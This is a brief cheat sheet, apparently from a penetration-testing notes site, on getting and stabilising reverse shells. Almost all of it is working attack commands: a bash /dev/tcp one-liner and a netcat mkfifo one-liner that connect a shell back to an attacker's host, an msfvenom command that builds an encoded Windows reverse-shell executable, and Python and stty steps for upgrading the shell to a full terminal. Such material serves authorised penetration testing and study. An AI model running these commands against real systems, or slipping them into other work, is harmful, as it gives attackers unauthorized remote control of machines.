Reverse Shell

One-Liners

Bash

bash -i >& /dev/tcp/<IP>/<port> 0>&1

Netcat

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <port> >/tmp/f
Sometimes one one-liner won't work, but another will. Two great cheatsheets are pentestmonkey and highoncoffee.

Generate Payload

Msfvenom

Windows reverse shell with encoder

msfvenom -p windows/shell_reverse_tcp -a x86 --encoder /x86/shikata_ga_nai LHOST=<Your IP> LPORT=<Listening Port> -f exe -o <Shell Name>.exe

Shell Cushions

If the reverse shell is terminal-based some measures can be taken to make it more comfortable to use.

Spawn TTY

Python

python -c β€˜import pty;pty.spawn(β€œ/bin/bash”)’
​Additional ways to spawn TTY.

Auto-Completion

Background the process with Ctrl+z.
Execute this to disable echoing and send I/O straight through without processing.
stty raw -echo
return to the process with fg + Enter x2.
​
Copy link
On this page
One-Liners
Generate Payload
Msfvenom
Shell Cushions
Spawn TTY
Auto-Completion